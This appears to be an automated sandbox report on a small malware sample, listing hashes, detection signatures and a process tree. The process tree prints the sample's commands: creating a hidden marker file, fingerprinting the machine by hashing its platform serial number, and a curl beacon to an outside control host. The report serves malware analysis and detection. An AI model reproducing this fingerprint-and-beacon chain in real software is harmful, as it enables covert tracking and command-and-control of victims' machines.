Analysis
max time kernel: 149s
max time network: 1s
platform: debian-9_armhf
resource: debian9-armhf-20240729-en
resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 29-07-2024 07:40
Static task: static1
Behavioral task: behavioral1
  Sample: 3c6492a33885e363cae2841e0597c730_JaffaCakes118
  Resource: ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2
  Sample: 3c6492a33885e363cae2841e0597c730_JaffaCakes118
  Resource: debian9-armhf-20240729-en
Behavioral task: behavioral3
  Sample: 3c6492a33885e363cae2841e0597c730_JaffaCakes118
  Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
  Sample: 3c6492a33885e363cae2841e0597c730_JaffaCakes118
  Resource: debian9-mipsel-20240729-en
General
Target: 3c6492a33885e363cae2841e0597c730_JaffaCakes118
Size: 10KB
MD5: 3c6492a33885e363cae2841e0597c730
SHA1: 99d5f88fb1a33f321aa614cfe792200bdf9eba5c
SHA256: ead1f229097555af8724321021bb8bb5421947e67cd244065dbd2990a6dcdb49
SHA512: 302bdb0ffb3be9285e7453e04d6067ca03ebdb21af5c0f26e6cb982de1c91631bffb2aab5e2f3a298a54b93337e1b510bee87e3855503a246a130bcc87ce5193
SSDEEP: 192:g0AjH8A5Zjpcjxi3LKVMyIu8bXkvLvTWM3Tk3Sw3a8na8:g1cA5t8xgNb0/mVLnP
Malware Config
Signatures
Checks CPU configuration (1 TTPs, 1 IoCs)
Checks CPU information, which indicates whether the system is a virtual machine.
Processes:
  description: File opened for reading | ioc: /proc/cpuinfo | process: curl
Reads runtime system information (3 IoCs)
Reads data from the /proc virtual filesystem.
Processes:
  description: File opened for reading | ioc: /proc/self/maps | process: awk
  description: File opened for reading | ioc: /proc/sys/crypto/fips_enabled | process: curl
  description: File opened for reading | ioc: /proc/self/auxv | process: curl
Processes
/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118 (PID 642)
  command: /tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118
  /usr/bin/touch (PID 644)
    command: touch "/root/Library/Application Support/.upd2029"
  /usr/bin/awk (PID 647)
    command: awk "-F\"" "/IOPlatformSerialNumber/{print \$(NF-1)}"
    signatures: Reads runtime system information
  /usr/bin/tr (PID 648)
    command: tr -d "\\n"
  /usr/bin/openssl (PID 649)
    command: openssl md5
  /usr/bin/curl (PID 654)
    command: curl -s -L "http://events.macmymacupdater.com/services/channel/?mid=(stdin)= d41d8cd98f00b204e9800998ecf8427e"
    signatures: Checks CPU configuration; Reads runtime system information